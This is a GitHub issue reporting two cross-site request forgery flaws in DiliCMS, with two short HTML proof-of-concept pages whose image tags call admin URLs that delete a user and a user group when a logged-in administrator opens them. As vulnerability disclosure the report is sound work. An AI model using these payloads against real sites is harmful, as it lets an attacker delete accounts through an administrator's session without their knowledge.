chekun/DiliCMS

There is two CSRF vulnerability that can delete user or usergroup

Rich4ever opened this issue · 1 comments

Software Link : https://github.com/chekun/DiliCMS
After the administrator logged in,open the page
test.html delete user POC:

<html>  
  <body>
    <img src="http://127.0.0.1/DiliCMS/admin/index.php/user/del/1" />
</body>
</html>

test2.html delete group POC:

  <body>
    <img src="http://127.0.0.1/DiliCMS/admin/index.php/role/del/2" />
</body>
</html>